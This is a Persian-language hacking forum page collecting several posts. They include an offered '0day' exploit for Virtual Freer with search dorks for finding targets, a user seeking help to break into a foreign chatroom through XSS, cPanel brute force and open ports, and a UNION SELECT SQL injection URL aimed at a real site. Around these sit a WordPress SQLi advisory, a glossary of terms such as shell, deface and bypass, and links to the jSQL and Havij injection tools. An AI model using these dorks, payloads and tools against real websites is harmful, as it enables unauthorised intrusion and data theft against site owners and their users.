خب سلامی دوباره ECHZED هستم DANTE سابق این اکسپلویت رو دوست خوبم بیسکوییت پدر ثبت کردخ و حالا میخوایم دربارش بحث کنیم این اکسپلویت برای Virtual Freer هست و میتونید با دورک intext: Virtual Freer یا intext:power by Virtual Freer استفاده کنیدش شما سایت را با این دورک ها پیدا کنید و سپس با فایل پایتونی که پیوست میکنم میتونین از اون دسترسی بگیرید و دستورات خودتون رو وارد کنید باید ذکر کنم فایل پایتون 2 هستش و شما میتونین با تغییر دادن print ها و input ها به حالت پایتون 3 درش بیارید (برنامه نویسی پایتون بلد باشید میفهمید منظورم چیه) لینک اکسپلویت: [Hidden Content] vfrce.py
-
- اکسپلویت 0day
- پایتون 2
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
مشکل در نفوذ به سایت دارای باگ sql و سایتی که باگ xss داره
s.a.e.e.d پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان یه سایت(چت روم خارجی) رو اسکن کردم که باگ xss داره ولی نمیدونم چجوری باید به این باگ نفوذ کرد نتیجه اسکن دوتا روش تو انجمن دیدم که یکی تزریق این کد بود <script>alert(document.cookie)</script> ولی وقتی اینو تو قسمت عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست و روش دوم ریختن اسکریپت کیلاگر توسط باگ xss بود که اینم باید تو ادمین پیج انجام میدادی که نمیشد وقتی سایت رو اسکن کردم vega یه سری کوکی هم اوورد به نظرتون اونا بدرد میخوره !!!! whatweb هم یه سری کوکی بهم داد اینا به کار میان !!! سایت cpanel داره راهی برای نفوذ به cpanel هست !! از ابزار brutesploit میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید 25-53-80-110-119-143 ============================================================================================================================================================== و سایت دوم که باگ sql داشت (این سوال رو یبار پرسیدم ولی جوابی نگرفتم ) من تو قسمت فراخوانی تیبل ادمین مشکل دارم این سایت دارای باگ = [Hidden Content] اینم تمام تیبل هایی که داره = CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE من تیبل USER رو به هگز=(0x55534552) تبدیل کردم و دستورات رو به این شکل وارد کردم ولی نتیجه ای نگرفتم ! [Hidden Content]/news_display.php?id=-1397+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+%20information_schema.columns+where+table_name=0x55534552-- اساتید لطفا راهنمایی کنید- 2 پاسخ
-
- cross-site script
- هک چت روم
-
(و 12 مورد دیگر)
برچسب زده شده با :
-
اگر وبسایت وردپرس دارید حتما به نسخه 4.8.3 بروزرسانیش کنید. Severity Medium Patch available YES Number of vulnerabilities 1 CVSSv2 5 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C) CVSSv3 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C] CVE ID N/A CWE ID CWE-89 Exploitation vector Network Public exploit Not available Vulnerable software WordPress Vulnerable software versions WordPress 4.8.2 WordPress 4.8.1 WordPress 4.8 Show more Vendor URL WordPress.ORG Advisory type Public Security Advisory 1) SQL injection Description The vulnerability allows a remote attacker to execute arbitrary SQL commands in application's database. The vulnerability exists due to an error in $wpdb->prepare() that can lead to SQL injection attacks exploited via third-party software. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary SQL commands in web application database. Remediation Update to version 4.8.3. External links [Hidden Content]
-
گوگل: حفرههای امنیتی را تشخیص بده و جایزه بگیر
mownten پاسخی ارسال کرد برای یک موضوع در اخبار هک و امنیت
هم اکنون بسیاری از ما اپلیکیشنهای کاربردی مورد نیاز خود را از فروشگاههای آنلاینی همچون گوگل پلی استور و اپ استور تهیه میکنیم. استفاده تعداد زیادی از کاربران گوشیهای اندرویدی از برنامههای گوگل پلی استور و وجود برنامههای مخرب در این فروشگاه، باعث شده است گوگل این بار دست روی گوگل پلی بگذارد و برای حفظ امنیت برنامههای موجود در این فروشگاه وارد عمل شود، اما از طریق خود کاربران! گوگل با توسعه برنامهای با نام Google Play Security Reward Program به کسانی که در زمینه کشف باگها و حفرههای امنیتی متخصص هستند فرصت میدهد تا باگهایی که تشخیص دادهاند را به گوگل معرفی کنند و در ازای هر باگ تشخیص داده شده به آنها 1000 دلار به عنوان جایزه بدهد! البته گوگل این برنامه را به تنهایی طراحی نکرده است بلکه کمپانی HackerOne هم در این زمینه با گوگل همکاری داشته است. غول جستجو برای شروع، تنها برنامههای پرطرفدار و مهم را هدف قرار داده است و محققان امنیتی در حال حاضر تنها میتوانند با تشخیص حفرههای امنیتی موجود در برنامههای DropBox، line، Duolingo، SnapChat، Tinder، Alibaba، Mail.ru و Headspace از گوگل جایزه بگیرند. شاید گوگل در آینده نه چندان دور برای سایر برنامههای کم اهمیتتر هم این روال را در نظر بگیرد. البته این اولین اقدام گوگل برای افزایش امنیت و کشف حفرههای امنیتی موجود در سرویسها و برنامههایش نیست، قبلاً هم چنین اقدامی در مورد گوگل کروم انجام شده بود که اتفاقاً با موفقیت هم همراه بود. اگر شما هم در زمینه تشخیص باگ و حفرههای امنیتی متخصص هستید این فرصت را از دست ندهید، حفرهها را یافته و از گوگل جایزه بگیرید. این هم باید در نظر گرفت که اگر گوگل بتواند توجه ها را به برنامه های امن جلب کند باز هم ممکن است اتفاقاتی مثل استفاده جاسوسی از یک نسخه ی نرم افزار CCleaner در آینده با استفاده از این سرویس ها رخ دهد. -
معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه میباشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان میشود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانهای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز میگویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار میشود. علت این اشکالات میتواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخههایی تحت نام بتا یا آلفا انتشار میدهند تا افرادی آنها را بررسی کنند و این باگها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
-
- دفیس
- ip چیست؟
-
(و 43 مورد دیگر)
برچسب زده شده با :
- دفیس
- ip چیست؟
- آی پی چیست؟
- ip
- آی پی
- اکسپلویت چیست
- اکسپلویت
- پورت
- پورت چیست
- سی ام اس چیست
- cms چیست
- cms
- سی ام اس
- شل چیست
- شل چیست؟
- شل
- هک چیست
- باگ چیست
- باگ
- معنی هک
- هک چیست؟
- آموزش هک
- آموزش
- کلمات هک
- کلمات اختصاصی هک
- هک را از کجا باید آغاز کرد
- هک را از کجا باید آغاز کرد؟
- چگونه هکر شویم؟
- هکر
- چگونه هکر شویم
- از کجا هک را شروع کنیم
- شروع هک
- تازه واردها
- اصطلاحات هک برای تازه واردها
- اصطلاحات هک
- اصطلاح
- هک
- دفیس یعنی چه؟
- دفیس چیست؟
- مس دفیس
- مس دفیس چیست؟
- بایپس
- بایپس چیست؟
- bypass
- bypass چیست؟
-
آموزش هک وبسایت با باگ sql با استفاده از jSQL فوق العاده سریع و بدون کدنویسی
Mr.Bl4cK پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری
هک وبسایت با استفاده از باگ SQL با استفاده از jSQL در لینوکس فوق العاده سریع بدون کد نویسی ادمین فایندر و امکانات دیگری هم داره لطفا از این آموزش به طور صحیح استفاده کنین امیدوارم به دردتون بخوره Screencast_08-06-2017_11:13:05 PM.webm -
با سلام خدمت تمامی دوستان گرامی این تایپک رو زدم واسه بعضی از دوستان که کارشون امنیت وب سایت ها هست امید وار مفید باشه. دوستانی که استفاده کردن تشکر کنن.
- 1 پاسخ
-
- باگ
- نفوذ با باگ
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
تعریف کلی از باگ ها (سمت سرور , وب اپلیکیشن , ویندوز و لینوکس اپلیکیشن )
k.shadow پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
به نام خدا سلام و درود خدمت تمامی عزیزان گارد ایران مدتی هست که دوستان در گارد ایران در مورد باگ های امنیتی چه در انجمن و چه در تلگرام از من سوال میپرسن خوب تصمیم گرفتم این تاپیک رو ایجاد کنم در جواب به اینگونه دوستان باید بگم بله باگ بسیار هست خوب امروز این مبحث رو کاملا گسترش و توضیح میدیم تعریف باگ رو که میدونید پس میریم سراغ بقیه موضوع کلا باگ های امنیتی به دوبخش کلی تقسیم میشن 1- باگ های ریشه 2- باگ هایی که از باگ های ریشه ساخته میشن باگ های ریشه که میدونید شامل sql injection xss csrf lfi rfi rfu rce bof میشن وبرای مثال باگ bypass admin page از باگ sql injection ساخته شده پس باید شما به باگ های ریشه تسلط داشته باشید و بعد از این میرسیم به جواب دوستان باگ هایی که میایم باهش سایت هک میکنیم هم به دوبخش تقسیم میشه 1- باگ وب اپلیکیشن: این نوع باگ در اثر اشتباهات برنامه نویسان به وجود میاد و در صفحات وب ما اون هارو مشاهده میکنیم و میتونیم با اون ها به سایت نفوذ کنیم و.... مانند باگ sql injection 2- باگ های سمت سرور : در اثر اشتباهات برنامه نویسان سیستم عامل روی سرور یا فایروال های سرور و ... به وجود میاد و سطحشون از باگ های وب اپلیکیشن بسیار بالاتر هست چون همونطور که میدونید اگه ما توسط یک باگ وب اپلیکیشن شل بریزیم بعد باید تلاش بسیاری در بایپس مود های امنیتی (دیسیبل فانکشن و سیف مود و روت شدن به سرور و .... )کنیم ولی باگ های سمت سرور کلا دسترسی بالایی از سرور به ما میدن حتی در حد روت خوب باگ های وب اپلیکیشن مخصوص باگ های ریشه نو نت اموزش رایگان فراوون هست و احتیاجی به دونستن کامل اصول شبکه و طرز کار cpu , hard , memory و ..... نداره ولی در باگ های سمت سرور مثلا buffer over flow احتیاج به دونستن دانش از طرز کار سی پیو هست مخصوصا ثبات های سی پیو هست و برای اکسپلوییت کردن احتیاج با دانستن زبان c در حد کم و یکک زبان برنامه نویسی (من خودم python یاد گرفتم :دی) هست باگ های سمت سرور بسیار هستن در حدی که بعضی از هکران اقدام به قرار دادن اکسپلوییت های اونا در سطح وب نمیکنن برای مثال باگ mysql sintacks over flow تا همین سال پیش رایگان در دسترس همه قرار نمیگرفت امید وارم مورد توجه دوستان قرار گرفته باشه اگه دوستان مایل بودن اموزش بافر اور فلو رو بزارم تو خصوصی به من پیام بدن اشتباهات تایپی رو هم به بزرگی خودتون ببخشید پیروز باشید-
- باگ
- باگ های مختلف
- (و 12 مورد دیگر)
-
سلام دوستان کتابی حدودن مبتدی برای درک و فهم موضوع اسب پذیری و کلمات و معانی اولیه در باگ .حتما دان کنید و بخونید باشد که مفید باشد.فداااا آسیب پذیری وب سایت ها.rar
-
راهنمایی برای استفاده از باگ SQL
ElkCloner پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام من میخوام که با استفاده از باگ SQL توی سافت هویج تیبل های یه سایت رو در بیارم ولی ارور Keyword مانع میشه لطفا اگه اطلاعاتی در این مورد دارید که چطور بطرف کنم و توی بخش Keyword جی بنویسیم ممنون -
استفاده از script
Ariyan791 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام. دوستان از این اسکریب هایی که توی بخش باگ ها هست چطور استفاده کنیم؟ من جست و جو کردم نبود.شرمنده اگه قبلا باسخ داده شده. -
درود.. نسخه کامل اسکنر هویج 1.17 Havij scanner last version لینک دانلود [Hidden Content]
- 1 پاسخ
-
- اسکنر
- اسکنر هویج
-
(و 8 مورد دیگر)
برچسب زده شده با :